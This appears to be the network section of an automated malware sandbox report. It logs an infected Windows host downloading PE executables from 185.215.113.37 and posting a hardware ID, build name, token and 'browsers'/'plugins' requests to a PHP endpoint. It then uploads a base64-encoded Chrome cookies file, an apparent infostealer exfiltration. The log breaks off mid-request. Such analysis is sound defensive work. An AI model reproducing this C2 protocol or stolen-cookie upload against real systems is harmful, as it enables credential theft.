00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 00:40:18 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 00:40:19 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 00:40:21 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 00:40:22 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIDBKKKKKFBGDGDHIDBGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 35 34 37 43 44 36 43 32 32 35 33 34 32 32 38 33 31 39 34 30 33 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 2d 2d 0d 0a Data Ascii: ------GIDBKKKKKFBGDGDHIDBGContent-Disposition: form-data; name="hwid"B547CD6C22534228319403------GIDBKKKKKFBGDGDHIDBGContent-Disposition: form-data; name="build"save------GIDBKKKKKFBGDGDHIDBG--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBKKKEGIDBGHIDGDHDBFHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 2d 2d 0d 0a Data Ascii: ------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="message"browsers------EBKKKEGIDBGHIDGDHDBF--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBAFIIJKJEGIDGDGIIDHHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 41 46 49 49 4a 4b 4a 45 47 49 44 47 44 47 49 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 46 49 49 4a 4b 4a 45 47 49 44 47 44 47 49 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 46 49 49 4a 4b 4a 45 47 49 44 47 44 47 49 49 44 48 2d 2d 0d 0a Data Ascii: ------FBAFIIJKJEGIDGDGIIDHContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------FBAFIIJKJEGIDGDGIIDHContent-Disposition: form-data; name="message"plugins------FBAFIIJKJEGIDGDGIIDH--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIJDAAAAAAKECBFBAEHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 2d 2d 0d 0a Data Ascii: ------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="message"fplugins------HIIIJDAAAAAAKECBFBAE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDBGDGCGDAKFIDGIDBFHost: 185.215.113.37Content-Length: 5751Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGDHJDHDAFHJJKJEHCHost: 185.215.113.37Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4e 7a 67 33 4d 7a 67 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 67 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 33 4f 54 4d 34 43 55 35 4a 52 41 6b 31 4d 54 45 39 62 33 4a 6a 55 30 6c 75 62 31 70 43 59 6a 5a 54 63 6e 63 77 55 47 52 51 54 55 35 6c 54 45 64 4c 63 32 56 6e 5a 6b 78 70 4c 58 52 52 62 6e 5a 70 61 47 38 31 61 45 74 4b 57 45 74 45 54 6d 63 77 61 31 68 4a 55 47 35 6d 56 47 4e 31 64 31 59 31 63 6a 64 53 63 57 70 55 4f 44 6b 7a 63 46 64 48 53 6b 59 33 61 32 78 4c 63 57 78 6b 51 6d 39 71 4e 48 4a 45 53 6e 5a 34 5a 6b 5a 73 5a 30 52 50 51 32 4e 58 4f 57 46 4c 52 47 35 56 4f 58 70 4a 62 46 56 6f 4d 6b 78 51 4d 48 5a 50 4f 47 73 7a 64 56 51 77 5a 30 68 4b 52 44 46 4b 64 6c 5a 42 59 32 78 72 53 6d 35 4c 64 31 70 48 4e 6d 68 45 51 57 77 32 4d 6b 68 79 54 58 68 4f 63 6c 56 6c 63 56 4e 53 4c 56 64 47 4d 55 6f 74 62 44 6c 5a 57 57 64 46 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 2d 2d 0d 0a Data Ascii: ------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwNzg3MzgJMVBfSkFSCTIwMjMtMTAtMDUtMDgKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjk3OTM4CU5JRAk1MTE9b3JjU0lub1pCYjZTcncwUGRQTU5lTEdLc2VnZ
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCBFIJEHDHCBGDGDGCBHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 46 49 4a 45 48 44 48 43 42 47 44 47 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 46 49 4a 45 48 44 48 43 42 47 44 47 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 